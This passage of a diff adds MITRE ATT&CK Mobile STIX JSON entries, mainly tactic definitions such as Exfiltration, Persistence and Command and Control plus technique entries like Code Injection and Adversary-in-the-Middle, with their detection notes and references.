"2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0036", + "url": "https://attack.mitre.org/tactics/TA0036", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:06:42.009Z", + "name": "Exfiltration", + "description": "The adversary is trying to steal data.\n\nExfiltration refers to techniques and attributes that result or aid in the adversary removing files and information from the targeted 
mobile device.\n\nIn the mobile environment, mobile devices are frequently connected to networks outside enterprise control such as cellular networks or public Wi-Fi networks. Adversaries could attempt to evade detection by communicating on these networks, and potentially even by using non-Internet Protocol mechanisms such as Short Message Service (SMS). However, cellular networks often have data caps and/or extra data charges that could increase the potential for adversarial communication to be detected.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "exfiltration" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0028", + "url": "https://attack.mitre.org/tactics/TA0028", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:03:15.455Z", + "name": "Persistence", + "description": " The adversary is trying to maintain their foothold.\n\nPersistence is any access, action, or configuration change to a mobile device that gives an attacker a persistent presence on the device. 
Attackers often will need to maintain access to mobile devices through interruptions such as device reboots and potentially even factory data resets.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "persistence" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0029", + "url": "https://attack.mitre.org/tactics/TA0029", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:03:49.343Z", + "name": "Privilege Escalation", + "description": " The adversary is trying to gain higher-level permissions.\n\nPrivilege escalation includes techniques that allow an attacker to obtain a higher level of permissions on the mobile device. 
Attackers may enter the mobile device with very limited privileges and may be required to take advantage of a device weakness to obtain higher privileges necessary to successfully carry out their mission objectives.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "privilege-escalation" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0037", + "url": "https://attack.mitre.org/tactics/TA0037", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:06:59.132Z", + "name": "Command and Control", + "description": "The adversary is trying to communicate with compromised devices to control them.\n\nThe command and control tactic represents how adversaries communicate with systems under their control within a target network. There are many ways an adversary can establish command and control with various levels of covertness, depending on system configuration and network topology. Due to the wide degree of variation available to the adversary at the network level, only the most common factors were used to describe the differences in command and control. There are still a great many specific techniques within the documented methods, largely due to how easy it is to define new protocols and use existing, legitimate protocols and network services for communication. \n\nThe resulting breakdown should help convey the concept that detecting intrusion through command and control protocols without prior knowledge is a difficult proposition over the long term. 
Adversaries' main constraints in network-level defense avoidance are testing and deployment of tools to rapidly change their protocols, awareness of existing defensive technologies, and access to legitimate Web services that, when used appropriately, make their tools difficult to distinguish from benign traffic.\n\nAdditionally, in the mobile environment, mobile devices are frequently connected to networks outside enterprise control such as cellular networks or public Wi-Fi networks. Adversaries could attempt to evade detection by communicating on these networks, and potentially even by using non-Internet Protocol mechanisms such as Short Message Service (SMS). However, cellular networks often have data caps and/or extra data charges that could increase the potential for adversarial communication to be detected.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "command-and-control" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756", + "type": "x-mitre-tactic", + "created": "2020-01-27T14:00:49.089Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0041", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0041" + } + ], + "modified": "2020-01-27T14:00:49.089Z", + "name": "Execution", + "description": "The adversary is trying to run malicious code.\n\nExecution consists of techniques that result in adversary-controlled code running on a mobile device. 
Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "execution" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0034", + "url": "https://attack.mitre.org/tactics/TA0034", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T16:09:15.308Z", + "name": "Impact", + "description": "The adversary is trying to manipulate, interrupt, or destroy your devices and data.\n\nThe impact tactic consists of techniques used by the adversary to execute his or her mission objectives but that do not cleanly fit into another category such as Collection. 
Mission objectives vary based on each adversary's goals, but examples include toll fraud, destruction of device data, or locking the user out of his or her device until a ransom is paid.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "impact" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0031", + "url": "https://attack.mitre.org/tactics/TA0031", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:05:02.718Z", + "name": "Credential Access", + "description": "The adversary is trying to steal account names, passwords, or other secrets that enable access to resources.\n\nCredential access represents techniques that can be used by adversaries to obtain access to or control over passwords, tokens, cryptographic keys, or other values that could be used by an adversary to gain unauthorized access to resources. Credential access allows the adversary to assume the identity of an account, with all of that account's permissions on the system and network, and makes it harder for defenders to detect the adversary. 
With sufficient access within a network, an adversary can create accounts for later use within the environment.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "credential-access" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0035", + "url": "https://attack.mitre.org/tactics/TA0035", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:06:10.915Z", + "name": "Collection", + "description": "The adversary is trying to gather data of interest to their goal.\n\nCollection consists of techniques used to identify and gather information, such as sensitive files, from a target network prior to exfiltration. 
This category also covers locations on a system or network where the adversary may look for information to exfiltrate.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "collection" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0033", + "url": "https://attack.mitre.org/tactics/TA0033", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:05:37.854Z", + "name": "Lateral Movement", + "description": "The adversary is trying to move through your environment.\n\nLateral movement consists of techniques that enable an adversary to access and control remote systems on a network and could, but does not necessarily, include execution of tools on remote systems. 
The lateral movement techniques could allow an adversary to gather information from a system without needing additional tools, such as a remote access tool.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "lateral-movement" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0030", + "url": "https://attack.mitre.org/tactics/TA0030", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:04:46.497Z", + "name": "Defense Evasion", + "description": " The adversary is trying to avoid being detected.\n\nDefense evasion consists of techniques an adversary may use to evade detection or avoid other defenses. Sometimes these actions are the same as or variations of techniques in other categories that have the added benefit of subverting a particular defense or mitigation. Defense evasion may be considered a set of attributes the adversary applies to all other phases of the operation.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "defense-evasion" + }, + { + "modified": "2022-11-07T21:01:17.781Z", + "name": "Network Effects", + "description": "The adversary is trying to intercept or manipulate network traffic to or from a device.\n\nThis category refers to network-based techniques that an adversary may be able to use to fulfill his or her objectives without access to the mobile device itself. 
These include techniques to intercept or manipulate network traffic to and from the mobile device.", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "network-effects", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0038", + "external_id": "TA0038" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0032", + "url": "https://attack.mitre.org/tactics/TA0032", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T16:09:00.466Z", + "name": "Discovery", + "description": "The adversary is trying to figure out your environment.\n\nDiscovery consists of techniques that allow the adversary to gain knowledge about the characteristics of the mobile device and potentially other networked systems. When adversaries gain access to a new system, they must orient themselves to what they now have control of and what benefits operating from that system give to their current objective or overall goals during the intrusion. 
The operating system may provide capabilities that aid in this post-compromise information-gathering phase.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "discovery" + }, + { + "modified": "2022-11-07T21:01:36.112Z", + "name": "Remote Service Effects", + "description": "The adversary is trying to control or monitor the device using remote services.\n\nThis category refers to techniques involving remote services, such as vendor-provided cloud services (e.g. Google Drive, Google Find My Device, or Apple iCloud), or enterprise mobility management (EMM)/mobile device management (MDM) services that an adversary may be able to use to fulfill his or her objectives without access to the mobile device itself.", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "remote-service-effects", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0039", + "external_id": "TA0039" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Scheduled Task/Job", + "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. 
On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.\n\nOn Android, the `WorkManager` API allows asynchronous tasks to be scheduled with the system. `WorkManager` was introduced to unify task scheduling on Android, using `JobScheduler`, `GcmNetworkManager`, and `AlarmManager` internally. `WorkManager` offers a lot of flexibility for scheduling, including periodically, one time, or constraint-based (e.g. only when the device is charging).(Citation: Android WorkManager)\n\nOn iOS, the `NSBackgroundActivityScheduler` API allows asynchronous tasks to be scheduled with the system. The tasks can be scheduled to be repeating or non-repeating, however, the system chooses when the tasks will be executed. The app can choose the interval for repeating tasks, or the delay between scheduling and execution for one-time tasks.(Citation: Apple NSBackgroundActivityScheduler)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_detection": "Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Lorin Wu, Trend Micro" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "created": "2020-11-04T16:43:31.619Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1603", + "external_id": "T1603" 
+ }, + { + "source_name": "Android WorkManager", + "description": "Google. (n.d.). Schedule tasks with WorkManager. Retrieved November 4, 2020.", + "url": "https://developer.android.com/topic/libraries/architecture/workmanager" + }, + { + "source_name": "Apple NSBackgroundActivityScheduler", + "description": "Apple. (n.d.). NSBackgroundActivityScheduler. Retrieved November 4, 2020.", + "url": "https://developer.apple.com/documentation/foundation/nsbackgroundactivityscheduler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--039bc59c-ecc7-4997-b2b4-4ab728bd91aa", + "created": "2019-10-30T15:37:55.029Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1540", + "url": "https://attack.mitre.org/techniques/T1540" + }, + { + "source_name": "Fadeev Code Injection Aug 2018", + "url": "https://fadeevab.com/shared-library-injection-on-android-8/", + "description": "Alexandr Fadeev. (2018, August 26). Shared Library Injection on Android 8.0. Retrieved October 30, 2019." + }, + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + }, + { + "source_name": "Shunix Code Injection Mar 2016", + "url": "https://shunix.com/shared-library-injection-in-android/", + "description": "Shunix . (2016, March 22). Shared Library Injection in Android. Retrieved October 30, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use code injection attacks to implant arbitrary code into the address space of a running application. Code is then executed or interpreted by that application. Adversaries utilizing this technique may exploit capabilities to load code in at runtime through dynamic libraries.\n\nWith root access, `ptrace` can be used to target specific applications and load shared libraries into its process memory.(Citation: Shunix Code Injection Mar 2016)(Citation: Fadeev Code Injection Aug 2018) By injecting code, an adversary may be able to gain access to higher permissions held by the targeted application by executing as the targeted application. In addition, the adversary may be able to evade detection or enable persistent access to a system under the guise of the application’s process.(Citation: Google Triada June 2019)\n", + "modified": "2022-03-30T19:14:20.369Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Code Injection", + "x_mitre_detection": "Code injection can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-15T16:39:32.207Z", + "name": "Adversary-in-the-Middle", + "description": "Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data 
Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). \n\n \n\n[Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic. \n\n \n\nOutside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning. \n\n \n\nIf applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services should look for applications that request VPN access. These applications should be heavily scrutinized since VPN functionality is not very common. Mobile security products can potentially detect rogue Wi-Fi access points if the adversary is attempting to decrypt traffic using an untrusted SSL certificate. \n\n \n\nOn both Android and iOS, users must grant consent to an application to act as a VPN. Both platforms also provide visual context to the user in the top status bar when a VPN connection is active. 
Users can see registered VPN services in the device settings. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "created": "2022-04-05T20:11:08.894Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1638", + "external_id": "T1638" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html", + "external_id": "CEL-3" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html", + "external_id": "APP-0" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html", + "external_id": "APP-1" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-8.html", + "external_id": "APP-8" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-12.html", + "external_id": "ECO-12" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-15T16:23:59.281Z", + "name": "Abuse Elevation Control Mechanism", + "description": "Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions. 
Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can gain on a machine. Authorization has to be granted to specific users in order to perform tasks that are designated as higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "When an application requests administrator permission, users are presented with a popup and the option to grant or deny the request. Application vetting services can detect when an application requests administrator permission. Extra scrutiny could be applied to applications that do", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3", + "created": "2022-04-01T15:54:05.633Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1626", + "external_id": "T1626" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--0bcc4ec1-a897-49a9-a9ff-c00df1d1209d", + "type": 
"attack-pattern", + "created": "2017-10-25T14:48:08.155Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1454", + "external_id": "T1454" + } + ], + "modified": "2019-04-29T19:35:30.985Z", + "name": "Malicious SMS Message", + "description": "Test", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_version": "1.0", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--0c71033e-401e-4b97-9309-7a7c95e43a5d", + "created": "2017-10-25T14:48:18.237Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1470", + "url": "https://attack.mitre.org/techniques/T1470" + }, + { + "source_name": "Elcomsoft-EPPB", + "url": "https://www.elcomsoft.com/eppb.html", + "description": "Elcomsoft. (n.d.). Elcomsoft Phone Breaker. Retrieved December 29, 2016." + }, + { + "source_name": "Elcomsoft-WhatsApp", + "url": "https://blog.elcomsoft.com/2017/07/extract-and-decrypt-whatsapp-backups-from-icloud/", + "description": "Oleg Afonin. (2017, July 20). Extract and Decrypt WhatsApp Backups from iCloud. Retrieved July 6, 2018." 
+ }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-0.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-0" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-1" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.g. Google's Android backup service or Apple's iCloud) could use that access to obtain sensitive data stored in device backups. For example, the Elcomsoft Phone Breaker product advertises the ability to retrieve iOS backup data from Apple's iCloud (Citation: Elcomsoft-EPPB). Elcomsoft also describes (Citation: Elcomsoft-WhatsApp) obtaining WhatsApp communication histories from backups stored in iCloud.", + "modified": "2022-04-06T15:54:11.189Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain Device Cloud Backups", + "x_mitre_detection": "Google provides the ability for users to view their account activity. Apple iCloud also provides notifications to users of account activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "remote-service-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:43:03.218Z", + "name": "Uninstall Malicious Application", + "description": "Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by: \n \n* Abusing device owner permissions to perform silent uninstallation using device owner API calls. 
\n* Abusing root permissions to delete files from the filesystem. \n* Abusing the accessibility service. This requires sending an intent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can see a list of applications that can use accessibility services in the device settings. Application vetting services could look for use of the accessibility service or features that typically require root access.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "created": "2022-03-30T19:31:31.855Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1630/001", + "external_id": "T1630.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html", + "external_id": "APP-43" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:42:18.121Z", + "name": "Indicator Removal on Host", + "description": "Adversaries may delete, alter, or hide generated artifacts on a device, including files, jailbreak status, or the malicious application itself. 
